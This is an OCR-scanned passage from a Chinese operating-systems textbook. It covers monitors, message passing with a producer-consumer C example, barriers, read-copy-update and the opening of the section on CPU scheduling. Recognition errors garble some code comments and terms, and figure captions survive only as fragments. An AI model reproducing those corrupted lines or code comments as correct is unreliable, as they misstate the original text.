private void go_to_sleep() { try{wait( );} catch(InterruptedException exc) {};} 





图 2-35 用 Java 语 言 实现 的 生产 者 一 消费 者 问题 的 解法 


通过 临界 区 互 斥 的 自动 化 ， 管 程 比 信号 量 更 容易 保证 并 行 编程 的 正确 性 。 但 管 程 也 有 缺点 。 我 们 之 
所 以 使 用 类 Pascal 和 Java， 而 不 像 在 本 书 中 其 他 例子 那样 使 用 C 语 言 ， 并 不 是 没有 原因 的 。 正 如 前 面 提 到 
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过 的 ， 管 程 是 一 个 编程 语言 概念 ， 编 译 器 必须 要 识别 管 程 并 用 某 种 方式 对 其 互 斥 做 出 安排 。C、Pascal 
以 及 多 数 其 他 语言 都 没有 管 程 ， 所 以 指望 这 些 编 译 器 遵守 互 斥 规则 是 不 合理 的 。 实 际 中 ， 如 何 能 让 编译 
器 知道 哪些 过 程 属于 管 程 ， 哪 些 不 属于 管 程 呢 ? 

在 上 述 语 言 中 同样 也 没有 信号 量 ， 但 增加 信号 量 是 很 容易 的 : 读者 需要 做 的 就 是 向 库 里 加 入 两 段 短 
小 的 汇编 程序 代码 ， 以 执行 Up 和 down 系 统 调 用 。 编 译 器 甚至 用 不 着 知道 它们 的 存在 。 当 然 ， 操 作 系 统 
必须 知道 信号 量 的 存在 ， 或 至 少 有 一 个 基于 信号 量 的 操作 系统 ， 读 者 仍旧 可 以 使 用 C 或 C++ (甚至 是 汇 
编 语言 ， 如 果 读 者 乐意 的 话 ) 来 编写 用 户 程序 ， 但 是 如 果 使 用 管 程 ， 读 者 就 需要 一 种 带 有 管 程 的 语言 。 

与 管 程 和 信号 量 有 关 的 另 一 个 问题 是 ， 这 些 机 制 都 是 设计 用 来 解决 访问 公共 内 存 的 一 个 或 多 个 CPU 
上 的 互 斥 问题 的 。 通 过 将 信号 量 放 在 共享 内 存 中 并 用 TSL 或 XCHG 指 令 来 保护 它们 ， 可 以 避免 竟 争 。 如 
果 一 个 分 布 式 系统 具有 多 个 CPU， 并 且 每 个 CPU 拥有 自己 的 私有 内 存 ， 它 们 通过 一 个 局 域 网 相连 ， 那 么 
这 些 原 语 将 失效 。 这 里 的 结论 是 : 信号 量 太 低级 了 ， 而 管 程 在 少数 几 种 编程 语言 之 外 又 无 法 使 用 ， 并 且 ， 
这 些 原 语 均 未 提供 机 器 间 的 信息 交换 方法 。 所 以 还 需要 其 他 的 方法 。 


2.3.8 消息 传递 

上 面 提 到 的 其 他 的 方法 就 是 消息 传递 (message passing) 。 这 种 进程 间 通 信 的 方法 使 用 两 条 原 语 
send 和 receive， 它 们 像 信 号 量 而 不 像 管 程 ， 是 系统 调用 而 不 是 语言 成 分 。 因 此 ， 可 以 很 容易 地 将 它们 
加 入 到 库 例 程 中 去 。 例 如 : 

send(destination, &message); 
和 

receive(source, &message); 
前 一 个 调用 向 一 个 给 定 的 目标 发 送 一 条 消息 ， 后 一 个 调用 从 一 个 给 定 的 源 (或 者 是 任意 源 ， 如 果 接 收 者 
不 介意 的 话 ) 接收 一 条 消息 。 如 果 没 有 消息 可 用 ， 则 接收 者 可 能 被 阻 蹇 ， 直 到 一 条 消息 到 达 ， 或 者 ， 带 
着 一 个 错误 码 立即 返回 。 

1. 消息 传递 系统 的 设计 要 点 

消息 传递 系统 面临 着 许多 信号 量 和 管 程 所 未 涉及 的 问题 和 设计 难点 ， 特 别 是 位 于 网 络 中 不 同 机 器 上 
的 通信 进程 的 情况 。 例 如 ， 消 息 有 可 能 被 网 络 丢 失 。 为 了 防止 消息 丢失 ， 发 送 方 和 接收 方 可 以 达成 如 下 
一 致 : 一 旦 接收 到 信息 ， 接 收 方 马 上 回 送 一 条 特殊 的 确认 (acknowledgement) 消息 。 如 果 发 送 方 在 一 
段 时 间 间 隔 内 未 收 到 确认 ， 则 重 发 消息 。 

现在 考虑 消息 本 身 被 正确 接收 ， 而 返回 给 发 送 者 的 确认 信息 丢失 的 情况 。 发 送 者 将 重 发 信息 ， 这 样 
接收 者 将 接收 到 两 次 相同 的 消息 。 对 于 接收 者 来 说 ， 如 何 区 分 新 的 消息 和 一 条 重 发 的 老 消息 是 非常 重要 
的 。 通 常 采用 在 每 条 原始 消息 中 嵌入 一 个 连续 的 序号 来 解决 此 问题 。 如 果 接 收 者 收 到 一 条 消息 ， 它 具有 
与 前 面 某 一 条 消息 一 样 的 序号 ， 就 知道 这 条 消息 是 重复 的 ， 可 以 忽略 。 不 可 靠 消息 传递 中 的 成 功 通信 问 
题 是 计算 机 网 络 的 主要 研究 内 容 。 更 多 的 信息 可 以 参考 相关 文献 Tanenbaum (1996) 和 Wetherall (2010)。 

消息 系统 还 需要 解决 进程 命名 的 问题 ， 在 send 和 receive 调 用 中 所 指定 的 进程 必须 是 没有 二 义 性 的 。 
身份 认证 (authentication) 也 是 一 个 问题 ， 比 如 ， 客 户 端 怎么 知道 它 是 在 与 一 个 真正 的 文件 服务 器 通信 ， 
而 不 是 与 一 个 冒充 者 通信 ? 

对 于 发 送 者 和 接收 者 在 同一 台 机 器 上 的 情况 ， 也 存在 若干 设计 问题 。 其 中 一 个 设计 问题 就 是 性 能 问 
题 。 将 消息 从 一 个 进程 复制 到 另 一 个 进程 通常 比 信号 量 操作 和 进入 管 程 要 慢 。 

2. 用 消息 传递 解决 生产 者 -消费 者 问题 

现在 我 们 来 考察 如 何 用 消息 传递 而 不 是 共享 内 存 来 解决 生产 者 一 消费 者 问题 。 在 图 2-36 中 给 出 了 一 
种 解法 。 假 设 所 有 的 消息 都 有 同样 的 大 小 ， 并 且 在 尚未 接收 到 发 出 的 消息 时 ， 由 操作 系统 自动 进行 缓冲 。 
在 该 解决 方案 中 共 使 用 N 条 消息 ， 这 就 类 似 于 一 块 共享 内 存 缓冲 区 中 的 N 个 槽 。 消 费 者 首先 将 N 条 空 消息 
发 送 给 生产 者 。 当 生产 者 向 消费 者 传递 一 个 数据 项 时 ， 它 取 走 一 条 空 消 息 并 送 回 一 条 填充 了 内 容 的 消息 。 
通过 这 种 方式 ， 系 统 中 总 的 消息 数 保持 不 变 ， 所 以 消息 都 可 以 存放 在 事先 确定 数量 的 内 存 中 。 

如 果 生 产 者 的 速度 比 消费 者 快 ， 则 所 有 的 消息 最 终 都 将 被 填 满 ， 等 待 消费 者 ， 生 产 者 将 被 阻塞 ， 等 
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待 返回 一 条 空 消 息 。 如 果 消 费 者 速度 快 ， 则 情况 正好 相反 : 所 有 的 消息 均 为 空 ， 等 待 生产 者 来 填充 它们 ， 
. 消费 者 被 阻塞 ， 以 等 待 一 条 填充 过 的 消息 。 

消息 传递 方式 可 以 有 许多 变 体 ， 下 面 首先 介绍 如 何 对 消息 进行 编 址 。 一 种 方法 是 为 每 个 进程 分 配 一 
个 唯一 的 地 址 ， 让 消息 按 进程 的 地 址 编 址 。 另 一 种 方法 是 引入 一 种 新 的 数据 结构 ， 称 作 信 箱 (mailbox), 
信箱 是 一 个 用 来 对 一 定数 量 的 消息 进行 缓冲 的 地 方 ， 信 箱 中 消息 数量 的 设置 方法 也 有 多 种 ， 典 型 的 方法 
是 在 信箱 创建 时 确定 消息 的 数量 。 当 使 用 信箱 时 ， 在 send 和 receive 调 用 中 的 地 址 参数 就 是 信箱 的 地 址 ， 
而 不 是 进程 的 地 址 。 当 一 个 进程 试图 向 一 个 满 的 信箱 发 消息 时 ， 它 将 被 挂 起 ， 直 到 信箱 内 有 消息 被 取 走 ， 
从 而 为 新 消息 腾 出 空间 。 

对 于 生产 者 一 消费 者 问题 ， 生 产 者 和 消费 者 均 应 创建 足够 容纳 N 条 消息 的 信箱 。 生 产 者 向 消费 者 信 
箱 发 送 包 含 实际 数据 的 消息 ， 消 费 者 则 向 生产 者 信箱 发 送 空 的 消息 。 当 使 用 信箱 时 ， 缓 冲 机 制 的 作用 是 
很 清楚 的 ， 目标 信箱 容纳 那些 已 被 发 送 但 尚未 被 目标 进程 接收 的 消息 。 


#define N 100 /* Rob PAR A */ 
void producer(void) 


int item; 
message m; /# 消息 缓冲 区 */ 


while (TRUE) { 
item = produce_item( ); 1* FOE BA Beh A — HER */ 
receive(consumer, &m); * 等 待 消费 者 发 送 空 缓冲 区 */ 
build_message(&m, item); /# 建立 一 个 待 发 送 的 消息 */ 
send(consumer, &m); /*# 发 送 数 据 项 给 消费 者 */ 


} 
} 


void consumer(void) 


int item, i; 
message m; 


for (i = 0; i < N; i++) send(producer, &m); /* 发 送 N 个 空 缓冲 区 */ 
while (TRUE) { 
receive(producer, &m); /* 接收 包含 数据 项 的 消息 */ 
item = extract_item(&m); /* 将 数据 项 从 消息 中 提取 出 来 */ 
send(producer, &m); /* 将 空 缓冲 区 发 送 回 生产 者 */ 
consume_item(item); /* 处 理 数据 项 */ 

} 
} 





图 2-36 用 N 条 消息 实现 的 生产 者 一 消费 者 问题 


使 用 信箱 的 另 一 种 极端 方法 是 彻底 取消 缓冲 。 采 用 这 种 方法 上 时， 如果 send 在 receive 之 前 执行 ， 则 
发 送 进程 被 阻塞 ， 直 到 receive 发 生 。 在 执行 receive 时 ， 消 息 可 以 直接 从 发 送 者 复制 到 接收 者 ， 不 用 任 
何 中 间 缓 冲 。 类 似 地 ， 如 果 先 执行 receive ， 则 接收 者 会 被 阻塞 ， 直 到 send 发 生 。 这 种 方案 常 被 称 为 会 
合 (rendezvous)。 与 带 有 缓冲 的 消息 方案 相 比 ， 该 方案 实现 起 来 更 容易 一 些 ， 但 却 降低 了 灵活 性 因为 
发 送 者 和 接收 者 一 定 要 以 步 步 紧 接 的 方式 运行 。 

通常 在 并 行程 序 设计 系统 中 使 用 消息 传递 。 例 如 ， 一 个 著名 的 消息 传递 系统 是 消息 传递 接口 
(Message-Passing Interface，MPI) ， 它 广泛 应 用 在 科学 计算 中 。 有 关 该 系统 的 更 多 信息 ， 可 参考 Gropp 
等 人 (1994) 和 Snir 等 人 (1996) 的 文献 。 


2.3.9 屏障 
最 后 一 个 同步 机 制 是 准备 用 于 进程 组 而 不 是 用 于 双 进 程 的 生产 者 一 消费 者 类 情形 的 。 在 有 些 应 用 中 
划分 了 若干 阶段 ， 并 且 规 定 ， 除 非 所 有 的 进程 都 就 绪 准 备 着 手下 一 个 阶段 ,否则 任何 进程 都 不 能 进入 下 
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一 个 阶段 。 可 以 通过 在 每 个 阶段 的 结尾 安置 屏障 (barrier) 来 实现 这 种 行为 。 当 一 个 进程 到 达 屏 障 时 ， 它 
就 被 屏障 阻拦 ， 直 到 所 有 进程 都 到 达 该 屏障 为 止 。 屏 障 可 用 于 一 组 进程 同步 ， 屏 障 的 操作 如 图 2-37 所 示 。 

在 图 2-37a 中 可 以 看 到 有 四 个 进程 接近 屏障 ， 这 意味 着 它们 正在 运算 ， 但 是 还 没有 到 达 每 个 阶段 的 
结尾 。 过 了 一 会 儿 ， 第 一 个 进程 完成 了 所 有 需要 在 第 一 阶段 进行 的 计算 。 它 接着 执行 barrier 原 语 ， 这 通 
常 是 调用 一 个 库 过 程 。 于 是 该 进程 被 挂 起 。 一 会 儿 ， 第 二 个 和 第 三 个 进程 也 完成 了 第 一 阶段 的 计算 ， 也 
接着 执行 barrier 原 语 。 这 种 情形 如 图 2-37b 所 示 。 结 果 ， 当 最 后 一 个 进程 C 到 达 屏 障 时 ， 所 有 的 进程 就 一 
起 被 释放 ， 如 图 2-37c 所 示 。 

作为 一 个 需要 屏障 的 例子 ， 考 虑 在 物理 或 工程 中 的 一 个 典型 弛 耶 问 题 。 这 是 一 个 带 有 初 值 的 矩阵 。 
这 些 值 可 能 代表 一 块 金属 板 上 各 个 点 的 温度 值 。 基 本 想法 可 以 是 准备 计算 如 下 的 问题 : 要 花费 多 长 时 间 ， 
在 一 个 角 上 的 火焰 才能 传播 到 整个 板 上 。 

计算 从 当前 值 开始 ， 先 对 和 矩阵 进行 一 个 变换 ， 从 而 得 到 第 二 个 矩阵 ， 例 如， 运用 热力 学 定律 考察 在 
AT 之 后 的 整个 温度 分 布 。 然 后 ， 进 程 不 断 重复 ， 随 着 金属 板 的 加 热 , 给 出 样本 点 温度 随时 间 变 化 的 函数 。 
该 算法 从 而 随时 间 变 化 生成 出 一 系列 矩阵 。 





时 间 一 > 时 间 一 ~ 时 间 一 ~ 
a) b) c) 


图 2-37 屏障 的 使 用 : a) 进程 接近 屏障 ，b) 除了 一 个 之 外 所 有 的 进程 都 被 屏障 阻塞 ， c) 当 最 后 一 个 进程 
到 达 屏 障 时 ， 所 有 的 进程 一 起 通过 


现在 ,设想 这 个 和 矩阵 非常 之 大 (比如 100 万 行 乘 以 100 万 列 ) ， 所 以 需要 并 行 处 理 (可 能 在 一 台 多 处 
理 器 上 ) 以 便 加 速 运算 。 各 个 进程 工作 在 这 个 矩阵 的 不 同 部 分 ， 并 且 从 老 的 矩阵 按照 物理 定律 计算 新 的 
矩阵 元 素 。 但 是 ， 除 非 第 n 次 迭代 已 经 完成 ， 也 就 是 说 ， 除 非 所 有 的 进程 都 完成 了 当前 的 工作 ， 否 则 没 
有 进程 可 以 开始 第 ”+ 1 次 迭代 。 实 现 这 一 目标 的 方法 是 通过 编程 使 每 一 个 进程 在 完成 当前 迭代 部 分 后 执 
行 一 个 屏障 操作 。 只 有 当 全 部 进程 完成 工作 之 后 ， 新 的 矩阵 〈 下 一 次 迭代 的 输入 ) 才 会 完成 ， 此 时 所 有 
的 进程 会 被 释放 而 开始 新 的 迭代 过 程 。 i 
2.3.10 避免 锁 : 读 -复制 -更 新 

最 快 的 锁 是 根本 没有 锁 。 问 题 在 于 在 没有 锁 的 情况 下 ， 我 们 是 否 允 许 对 共享 数据 结构 的 并 发 读 写 进 
行 访 问 。 在 通常 情况 下 ， 答 案 显 然 是 否定 的 。 假 设 进 程 A 正 在 对 一 个 数字 数组 进行 排序 ， 而 进程 B 正 在 
计算 其 均值 。 因 为 A 在 数组 中 将 数值 前 后 来 回 移动 ， 所 以 B 可 能 多 次 遇 到 某 些 数 值 ， 而 某 些 数值 则 根本 
没有 遇 到 过 。 得 到 的 结果 可 能 是 任意 值 ， 而 它 几 乎 肯定 是 错 的 。 

然而 ， 在 某 些 情况 下 ， 我 们 可 以 允许 写 操作 来 更 新 数据 结构 ， 即 便 还 有 其 他 的 进程 正在 使 用 它 。 容 
门 在 于 确保 每 个 读 操作 要 么 读 取 旧 的 数据 版 本 ， 要 么 读 取 新 的 数据 版 本 ， 但 绝 不 能 是 新 旧 数 据 的 一 些 奇 
怪 组 合 。 举 例 说 明 ， 考 虑 图 2-38 中 的 树 。 读 操作 从 根部 到 叶子 遍历 整个 树 。 在 图 的 上 半 部 分 ， 加 入 一 个 
新 的 节点 X。 为 了 实现 这 一 操作 ， 我 们 要 让 这 个 节点 在 树 中 可 见 之 前 使 它 “ 恰 好 正确 ”: 我 们 对 节点 X 中 
的 所 有 值 进 行 初始 化 ， 包 括 它 的 子 节点 指针 。 然 后 通过 原子 写 操作 ， 使 X 成 为 A 的 子 节点 。 所 有 的 读 操 
作 都 不 会 读 到 前 后 不 一 致 的 版 本 。 在 图 的 下 半 部 分 ， 我 们 接着 移 除 B 和 D。 首 先 ， 将 A 的 左 子 节点 指针 指 
向 C。 所 有 原本 在 A 中 的 读 操 作 将 会 后 续 读 到 节点 C， 而 永远 不 会 读 B 和 D。 也 就 是 说 ， 它 们 将 只 会 读 到 
新 版 数据 。 同 样 ， 所 有 当前 在 B 和 D 中 的 读 操作 将 继续 依照 原始 的 数据 结构 指针 并 且 读 取 旧 版 数据 。 所 
有 操作 均 正 确 进行 ， 我 们 不 需要 锁 住 任何 东西 。 而 不 需要 锁 住 数据 结构 就 能 移 去 B 和 D 的 主要 原因 就 是 
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读 -复制 -更 新 (Read-Copy-Update，RCU)， 将 更 新 过 程 中 的 移 除 和 再 分 配 过 程 分 离开 来 。 

当然 ， 还 有 一 个 问题 。 只 要 还 不 能 确定 没有 对 B 和 D 更 多 的 读 操 作 ， 我 们 就 不 能 真正 释放 它们 。 但 是 应 
该 等 待 多 久 呢 ? 一 分 钟 ? 或 者 十 分 钟 ”我 们 不 得 不 等 到 最 后 一 个 读 操作 读 完 这 些 节 点 。RCU 谨 慎 地 决定 读 操 
作 持 有 一 个 数据 结构 引用 的 最 大 时 间 。 在 这 段 时 间 之 后 ， 就 能 安全 地 将 内 存 回 收 。 特 别 地 ， 读 者 通过 读 端 临 
界 区 访问 数据 结构 ， 它 可 以 包含 任何 代码 ， 只 要 该 代码 不 阻塞 或 者 休眠 。 这 样 的 话 ， 就 知道 了 需要 等 待 的 最 
大 时 长 。 特 别 地 ， 我 们 定义 一 个 任意 时 间 段 的 宽 限 期 (grace period), ， 在 这 个 时 期 内 ， 每 个 线程 至 少 有 一 次 
在 读 端 临界 区 之 外 。 如 果 等 待 至 少 一 个 宽 限 期 的 时 间 段 后 进行 回收 ， 这 一 切 就 会 令 人 满意 。 由 于 读 端 临界 区 
中 的 代码 不 允许 阻塞 或 者 休眠 ， 因 此 一 个 简单 的 准则 就 是 一 直 等 到 所 有 的 线程 执行 完 一 次 上 下 文 切 换 。 


添加 一 个 节点 : 





a) 原始 的 树 b) 初始 化 节点 X， 并 将 o 当 X 初 始 化 完成 后 ， 将 X 与 A 相连 。 此 
E 与 X 相 连 。 A 和 E 中 时 X 中 的 读 操作 将 读 取 树 的 旧版 本 ， 
的 任何 读 操作 都 不 而 A 中 的 读 操作 将 获得 树 的 新 版 本 
会 受 影响 


a 


d) 使 B 与 A 分 离开 来 。 注 e) 等 待 直到 对 B 和 C 没 ”人 现在 可 以 安全 地 移 除 B 和 D 
意 此 时 B 中 可 能 仍然 有 有 更 多 的 读 操作 ， 
读 操作 ， 这 些 读 操 作 此 时 这 些 节点 将 不 
将 获得 树 的 旧版 本 ， 再 可 以 访问 
而 当前 A 中 的 读 操作 将 
获得 树 的 新 版 本 


图 2-38 读 - 复 制 -更 新 : 在 树 中 插入 一 个 节点 ， 然 后 移 除 一 个 分 支 ， 整 个 过 程 中 都 不 涉及 锁 


2.4 调度 

当 计 算 机 系统 是 多 道 程序 设计 系统 时 ， 通 常 就 会 有 多 个 进程 或 线程 同时 竞争 CPU。 只 要 有 两 个 或 更 
多 的 进程 处 于 就 绪 状 态 ， 这 种 情形 就 会 发 生 。 如 果 只 有 一 个 CPU 可 用 ， 那 么 就 必须 选择 下 一 个 要 运行 的 
进程 。 在 操作 系统 中 ， 完 成 选择 工作 的 这 一 部 分 称 为 调度 程序 (scheduler) ， 该 程序 使 用 的 算法 称 为 调 
度 算法 (scheduling algorithm), 

尽管 有 一 些 不 同 ， 但 许多 适用 于 进程 调度 的 处 理 方法 也 同样 适用 于 线程 调度 。 当 内 核 管理 线程 的 时 
候 ， 调 度 经 常 是 按 线程 级 别 的 ， 与 线程 所 属 的 进程 基本 或 根本 没有 关联 。 下 面 我 们 将 首先 关注 适用 于 进 
程 与 线程 两 者 的 调度 问题 ， 然 后 会 明确 地 介绍 线程 调度 以 及 它 所 产生 的 独特 问题 。 第 8 章 将 讨论 多 核 芯 
片 的 问题 。 


2.4.1 调度 简介 
让 我 们 回 到 早期 以 磁带 上 的 卡片 作为 输入 的 批 处 理 系 统 时 代 ， 那 时 的 调度 算法 很 简单 : 依次 运行 磁 
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带 上 的 每 一 个 作业 。 对 于 多 道 程序 设计 系统 ， 调 度 算法 要 复杂 一 些 ， 因 为 经 常 有 多 个 用 户 等 候 服 务 。 有 
些 大 型 机 系统 仍旧 将 批 处 理 和 分 时 服务 结合 使 用 ， 需 要 调度 程序 决定 下 一 个 运行 的 是 一 个 批 处 理 作业 还 
是 终端 上 的 一 个 交互 用 户 。( 顺 便 提 及 ， 一 个 批 处 理 作业 可 能 需要 连续 运行 多 个 程序 ， 不 过 在 本 节 中 ， 
假设 它 只 是 一 个 运行 单个 程序 的 请 求 。) 由 于 在 这 些 机 器 中 ，CPU 是 稀缺 资源 ， 所 以 好 的 调度 程序 可 以 
在 提高 性 能 和 用 户 的 满意 度 方面 取得 很 大 的 成 果 。 因 此 ， 大 量 的 研究 工作 都 花费 在 创造 聪明 而 有 效 的 调 
度 算 法 上 了 。 

在 个 人 计算 机 出 现 之 后 ， 整 个 情形 向 两 个 方面 发 展 。 首 先 ， 在 多 数 时 间 内 只 有 一 个 活动 进程 。 一 个 用 
户 进入 文字 处 理 软 件 编辑 一 个 文件 时 ， 一 般 不 会 同时 在 后 台 编 译 一 个 程序 。 在 用 户 向 文字 处 理 软件 键入 一 
条 命令 时 ， 调 度 程序 不 用 做 多 少 工作 来 判定 哪个 进程 要 运行 一 一 唯一 的 候选 者 是 文字 处 理 软件 。 

其 次 ， 同 CPU 是 稀缺 资源 时 的 年 代 相 比 ， 现 在 计算 机 速度 极 快 。 个 人 计算 机 的 多 数 程序 受到 的 是 用 
户 当前 输入 速率 (键入 或 敲 击 鼠 标 ) 的 限制 ， 而 不 是 CPU 处 理 速率 的 限制 。 即 便 对 于 编译 (这 是 过 去 
CPU 周期 的 主要 消耗 者 ) 现在 大 多 数 情 况 下 也 只 要 花费 仅仅 几 秒 钟 。 甚 至 两 个 实际 同时 运行 的 程序 ， 诸 
如 一 个 文字 处 理 软 件 和 一 个 电子 表单 ， 由 于 用 户 在 等 待 两 者 完成 工作 ， 因 此 很 难说 需要 哪 一 个 先 完成 。 
这 样 的 结果 是 ， 调 度 程序 在 简单 的 PC 上 并 不 重要 。 当 然 ， 总 有 应 用 程序 会 实际 消耗 掉 CPU， 例 如 ， 为 给 
制 一 小 时 高 精度 视频 而 调整 107 892 帧 (NTSC 制 ) 或 90 000 帧 (PAL 制 ) 中 的 每 一 帧 颜色 就 需要 大 量 工 
业 强度 的 计算 能 力 。 然 而 ， 类 似 的 应 用 程序 不 在 我 们 的 考虑 范围 。 

对 于 网 络 服务 器 ， 情 况 略 微 有 些 改变 。 这 里 ， 多 个 进程 经 常 竞争 CPU， 因 此 调度 功能 再 一 次 变 得 至 
关 重 要 。 例 如 ， 当 CPU 必须 在 运行 一 个 收集 每 日 统计 数据 的 进程 和 服务 用 户 需求 的 进程 之 间 进 行 选择 的 
时 候 ， 如 果 后 者 首先 占用 了 CPU ， 用 户 将 会 更 高 兴 。 

“资源 充足 ”这 个 论据 在 很 多 移动 设备 上 也 不 成 立 ， 比 如 智能 手机 (可 能 除了 最 先进 的 几 款 ) 以 及 
传感器 网 络 的 节点 。 这 些 情况 下 ，CPU 依 然 薄 弱 ， 内 存 也 偏 小 。 此 外 ， 因 为 电池 寿命 短 是 这 些 设备 最 重 
要 的 约束 之 一 ， 所 以 一 些 调度 算法 (scheduler) 在 努力 优化 电量 损耗 。 

另外 ， 为 了 选取 正确 的 进程 运行 ， 调 度 程 序 还 要 考虑 CPU 的 利用 率 ， 因 为 进程 切换 的 代价 是 比较 高 
的 。 首 先 用 户 态 必须 切换 到 内 核 态 ， 然 后 要 保存 当前 进程 的 状态 ， 包 括 在 进程 表 中 存储 寄存 器 值 以 便 以 
后 重新 装载 。 在 许多 系统 中 ， 内 存 映 像 例如， 页 表 内 的 内 存 访 问 位 ) 也 必须 保存 ， 接 着 ， 通 过 运行 调 
度 算法 选 定 一 个 新 进程 ， 之 后 ， 应 该 将 新 进程 的 内 存 映 像 重新 装 和 MMU， 最 后 新 进程 开始 运行 。 除 此 
之 外 ， 进 程 切 换 还 要 使 整个 内 存 高 速 缓存 失效 ， 强 迫 缓存 从 内 存 中 动态 重新 装 入 两 次 (进入 内 核 一 次 ， 
离开 内 核 一 次 )。 总 之 ， 如 果 每 秒 钟 切 换 进程 的 次 数 太 多 ， 会 耗费 大 量 CPU 时 间 ， 所 以 有 必要 提醒 注意 。 

1. 进程 行为 

几乎 所 有 进程 的 (磁盘 或 网 络 ) IO 请 求 和 计算 都 是 交替 突 发 的 ， 如 图 2-39 所 示 。 典 型 地 ，CPU 不 
停顿 地 运行 一 段 时 间 ， 然 后 发 出 一 个 系统 调用 以 便 读 写 文件 。 在 完成 系统 调用 之 后 ，CPU 又 开始 计算 ， 
直到 它 需 要 读 更 多 的 数据 或 写 更 多 的 数据 为 止 。 请 注意 ， 某 些 I/O 活 动 可 以 看 作 计算 。 例 如 ， 当 CPU 向 
视频 RAM 复 制 数据 以 更 新 屏幕 时 ， 因 为 使 用 了 CPU， 所 以 这 是 计算 ， 而 不 是 IO 活动 。 按 照 这 种 观点 ， 
当 一 个 进程 等 待 外 部 设备 完成 工作 而 被 阻塞 时 ， 才 是 IO 活动 。 





a) 
/. 
长 CPU 突 发 


短 CPU 突 发 A 
b) A 


时 间 一 一 > 
图 2-39 CPU 的 突 发 使 用 和 等 待 JO 的 时 期 交替 出 现 : a) CPU 密集 型 进程 ， b) IO 密集 型 进程 . 
图 2-39 中 有 一 件 值 得 注意 的 事 ， 即 某 些 进程 (图 2-39a 的 进程 ) 花费 了 绝 大 多 数 时 间 在 计算 上 ， 而 
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其 他 进程 (图 2-39b 的 进程 ) 则 在 等 待 JO 上 花费 了 绝 大 多 数 时 间 。 前 者 称 为 计算 密集 型 (compute-bound ) ， 
后 者 称 为 IO 密集 型 (IO-bound) 。 典 型 的 计算 密集 型 进程 具有 较 长 时 间 的 CPU 集中 使 用 和 较 小 频 度 的 
IO 等 待 。IO 密 集 型 进程 具有 较 短 时 间 的 CPU 集中 使 用 和 频繁 的 MO 等 待 。 它 是 IO 类 的 ， 因 为 这 种 进程 
在 IO 请 求 之 间 较 少 进行 计算 ， 并 不 是 因为 它们 有 特别 长 的 IO 请 求 。 在 IO 开始 后 无 论处 理 数据 是 多 还 是 
少 ， 它 们 都 花费 同样 的 时 间 提 出 硬件 请 求 读 取 磁 盘 块 。 

有 必要 指出 ， 随 着 CPU 变 得 越 来 越 快 ， 更 多 的 进程 倾 癌 为 IO 密集 型 。 这 种 现象 之 所 以 发 生 是 因为 
CPU 的 改进 比 磁盘 的 改进 快 得 多 ， 其 结果 是 ， 未 来 对 LO 密集 型 进程 的 调度 处 理 似 乎 更 为 重要 。 这 里 的 
基本 思想 是 ， 如 果 需 要 运行 IO 密集 型 进程 ， 那 么 就 应 该 让 它 尽快 得 到 机 会 ， 以 便 发 出 磁盘 请 求 并 保持 
磁盘 始终 忙碌 。 从 图 2-6 中 可 以 看 到 ， 如 果 进 程 是 1/O 密 集 型 的 ， 则 需要 多 运行 一 些 这 类 进程 以 保持 CPU 
的 充分 利用 。 

2. 何 时 调度 

有 关 调 度 处 理 的 一 个 关键 问题 是 何 时 进行 调度 决策 。 存 在 着 需要 调度 处 理 的 各 种 情形 。 第 一 ， 在 创建 
一 个 新 进程 之 后 ， 需 要 决定 是 运行 父 进程 还 是 运行 子 进程 。 由 于 这 两 种 进程 都 处 于 就 绪 状 态 ， 所 以 这 是 一 
种 正常 的 调度 决策 ， 可 以 任意 决定 ， 也 就 是 说 ， 调 度 程序 可 以 合法 选择 先 运行 父 进 程 还 是 先 运行 子 进程 。 

第 二 ， 在 一 个 进程 退出 时 必须 做 出 调度 决策 。 一 个 进程 不 再 运行 (因为 它 不 再 存在 ) ， 所 以 必须 从 
就 绪 进 程 集中 选择 另外 某 个 进程 。 如 果 没 有 就 绪 的 进程 ， 通 常会 运行 一 个 系统 提供 的 空闲 进程 。 

第 三 ， 当 一 个 进程 阻塞 在 VO 和 信号 量 上 或 由 于 其 他 原因 阻塞 时 ， 必 须 选 择 另 一 个 进程 运行 。 有 时 ， 
阻塞 的 原因 会 成 为 选择 的 因素 。 例 如 ， 如 果 A 是 一 个 重要 的 进程 ， 并 正在 等 待 B 退 出 临界 区 ， 让 B 随 后 运 
行将 会 使 得 B 退 出 临界 区 ， 从 而 可 以 让 A 运 行 。 不 过 问题 是 ， 通 常 调 度 程序 并 不 拥有 做 出 这 种 相关 考虑 
的 必要 信息 。 

第 四 ， 在 一 个 IO 中 断 发 生 时 ， 必 须 做 出 调度 决策 。 如 果 中 断 来 自 IO 设 备 ， 而 该 设备 现在 完成 了 工 
作 ， 某 些 被 阻塞 的 等 待 该 IO 的 进程 就 成 为 可 运行 的 就 绪 进 程 了 。 是 否 让 新 就 绪 的 进程 运行 ， 这 取决 于 
调度 程序 的 决定 ， 或 者 让 中 断 发 生 时 运行 的 进程 继续 运行 ， 或 者 应 该 让 某 个 其 他 进程 运行 。 

如 果 硬 件 时 钟 提供 50Hz、60Hz 或 其 他 频率 的 周期 性 中 断 ， 可 以 在 每 个 时 钟 中 断 或 者 在 每 个 时 钟 中 
断 时 做 出 调度 决策 。 根 据 如 何 处 理 时 钟 中 断 ， 可 以 把 调度 算法 分 为 两 类 。 非 抢占 式 调度 算法 挑选 一 个 进 
程 ， 然 后 让 该 进程 运行 直至 被 阻塞 (阻塞 在 IO 上 或 等 待 另 一 个 进程 ) ， 或 者 直到 该 进程 自动 释放 CPU。 
即使 该 进程 运行 了 若干 个 小 时 ， 它 也 不 会 被 强迫 挂 起 。 这 样 做 的 结果 是 ， 在 时 钟 中 断 发 生 时 不 会 进行 调 
度 。 在 处 理 完 时 钟 中 断后 ， 如 果 没 有 更 高 优先 级 的 进程 等 待 到 时 ， 则 被 中 断 的 进程 会 继续 执行 。 

相反 ， 抢 占 式 调度 算法 挑选 一 个 进程 ， 并 且 让 该 进程 运行 某 个 固定 时 段 的 最 大 值 。 如 果 在 该 时 段 结 
束 时 ， 该 进程 仍 在 运行 ， 它 就 被 挂 起 ， 而 调度 程序 挑选 另 一 个 进程 运行 (如 果 存 在 一 个 就 绪 进程 ) 。 进 
行 抢占 式 调 度 处 理 ， 需 要 在 时 间 间 隔 的 末端 发 生 时 钟 中 断 ， 以 便 把 CPU 控制 返回 给 调度 程序 。 如 果 没 有 
可 用 的 时 钟 ， 那 么 非 抢占 式 调 度 就 是 唯一 的 选择 了 。 

3. 调度 算法 分 类 

